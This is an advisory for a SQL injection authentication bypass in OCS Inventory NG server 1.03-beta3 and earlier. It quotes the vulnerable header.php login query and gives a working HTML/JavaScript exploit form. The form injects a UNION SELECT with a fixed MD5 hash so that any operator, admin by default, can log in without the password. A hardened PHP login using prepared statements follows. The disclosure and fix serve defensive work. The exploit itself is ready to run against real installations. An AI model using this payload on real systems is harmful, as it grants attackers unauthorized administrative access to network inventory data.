OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

Software    : Open Computer and Software (OCS) Inventory NG
Download    : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version     : 1.03-beta3 and prior
Impact      : Critical
Remote      : Yes (No authentication is needed)

== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an application designed to help a network or system administrator keep track of the configuration of the computers on the network and of the software installed on them.

The vulnerability is a SQL injection in the header.php file. The value of the "login" POST parameter is concatenated directly into a SELECT statement, so an attacker can pass a crafted SQL string which can be used to create or modify information stored in the database or to authenticate as any user.

script : header.php (lines 102-111)

// $_POST["login"] is spliced into the query without escaping or parameter binding
if(isset($_POST["login"])) {
    $req="SELECT id, accesslvl, passwd FROM operators WHERE id='".$_POST["login"]."'";
    $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());

    if($row=@mysql_fetch_object($res))
    {
        // DL 25/08/2005
        // Support new MD5 encrypted password or old clear password for login only
        // The passwd value compared here comes from whatever row the (attacker-controlled)
        // query returns, so a UNION can supply a passwd column of the attacker's choosing.
        if (($row->passwd != md5( $_POST["pass"])) and
            ($row->passwd != $_POST["pass"])) {

== Exploit ==

<script>
// Builds the injected "login" value: the UNION replaces the passwd column of the
// selected operator with a constant MD5 hash that matches the fixed "pass" value sent below.
function inject() {
    document.getElementById('log').action = document.getElementById('ocsreports').value + 'index.php';
    var sql = "0' UNION SELECT id, accesslvl, 'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='";
    document.getElementById('login').value = sql + document.getElementById('user').value;
    document.getElementById('pass').value = "inject";
}
</script>

<form name="log" id="log" action="" method="post">
<table border="0" width="450px">
<tr>
  <td><b>OCSReports :</b></td>
  <td><input type="text" id="ocsreports" size="40" value="http://127.0.0.1/ocsreports/" /></td>
</tr>
<tr>
  <td><b>Login :</b></td>
  <td><input type="text" id="user" size="40" value="admin" /></td>
</tr>
<tr>
  <td><input type="hidden" name="login" id="login" />
      <input type="hidden" name="pass" id="pass" /></td>
  <td><input type="submit" name="subLogin" onclick="inject();"></td>
</tr>
</table>
</form>
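As an added example, not code from OCS Inventory NG or from the advisory author, the following is a hardened replacement for the login check shown above. It assumes a mysqli connection (the original used the mysql_* extension), a hypothetical schema change in which operators.passwd stores password_hash() output instead of MD5 or clear text, and placeholder database credentials. The two properties that close the bypass are that the login value is bound as a parameter rather than concatenated, so a UNION in it is just a literal id, and that the password is only ever checked against a hash read from the operators row, never against a column shape the client can influence.

```php
<?php
// Added example (hypothetical hardened login for header.php); not the project's own code.
// Assumes mysqli and that operators.passwd holds password_hash() output.

function authenticate(mysqli $db, string $login, string $pass): ?array
{
    // Parameterised query: the login value is bound as data, so a value such as
    // "0' UNION SELECT ..." is compared literally against the id column.
    $stmt = $db->prepare("SELECT id, accesslvl, passwd FROM operators WHERE id = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param("s", $login);
    $stmt->execute();
    $stmt->bind_result($id, $accesslvl, $storedHash);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found) {
        return null;
    }

    // The hash comes from the stored row only; password_verify does a
    // constant-time comparison, and no clear-text fallback is accepted.
    if (!password_verify($pass, $storedHash)) {
        return null;
    }

    return ['id' => $id, 'accesslvl' => $accesslvl];
}

if (isset($_POST["login"], $_POST["pass"])) {
    // Placeholder connection parameters; replace with the real configuration.
    $db = new mysqli("localhost", "DB_USER_PLACEHOLDER", "DB_PASS_PLACEHOLDER", "DB_NAME_PLACEHOLDER");
    if ($db->connect_error) {
        http_response_code(500);
        exit("Database unavailable");
    }

    $operator = authenticate($db, (string) $_POST["login"], (string) $_POST["pass"]);
    if ($operator === null) {
        // Same response for unknown user and wrong password.
        http_response_code(401);
        exit("Login failed");
    }

    $_SESSION["loggedin"]  = $operator["id"];
    $_SESSION["accesslvl"] = $operator["accesslvl"];
}
```

Migrating existing MD5 or clear-text passwords to password_hash() can be done lazily at the next successful login, but the clear-text comparison branch in the original code should be removed as part of the same change, since it is what lets an injected literal in the passwd column satisfy the check.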